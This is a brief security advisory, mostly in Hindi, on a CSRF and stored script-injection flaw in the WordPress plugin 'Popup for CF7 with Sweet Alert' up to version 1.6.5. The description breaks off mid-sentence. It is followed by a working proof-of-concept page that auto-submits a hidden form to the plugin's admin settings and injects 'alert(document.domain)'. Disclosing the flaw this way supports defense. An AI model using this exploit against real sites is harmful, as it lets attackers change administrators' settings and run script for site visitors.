
Popup for CF7 with Sweet Alert <= 1.6.5 - क्रॉस-साइट रिक्वेस्ट फ़ॉर्जरी
CF7 के लिए पॉपअप Sweet Alert के साथ <= 1.6.5 - क्रॉस-साइट रिक्वेस्ट फ़ॉर्जरी
https://wordpress.org/plugins/cf7-sweet-alert-popup/
प्लगइन के सेटिंग्स हैंडलर में इसके nonce सत्यापन में एक लॉजिक त्रुटि है जो सभी CSRF सुरक्षा को अक्षम कर देती है। एक अनधिकृत हमलावर एक प्रमाणित प्रशासक को छिपे हुए स्वतः-सबमिटिंग फ़ॉर्म वाले दुर्भावनापूर्ण पृष्ठ पर जाने के लिए धोखा देकर इसका फायदा उठा सकता है, और मनमाने ढंग से प्लगइन सेटिंग्स को संशोधित कर सकता है। सबमिट किए गए मान बिना सैनिटाइज़ेशन के संग्रहीत किए जाते हैं और wp_head के माध्यम से प्रत्येक फ्रंटएंड पृष्ठ पर एक
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>
<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
method="POST" id="csrf" target="hiddenframe">
<input name="cf7simplePopupWidth" value="500;alert(document.domain)">
<input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>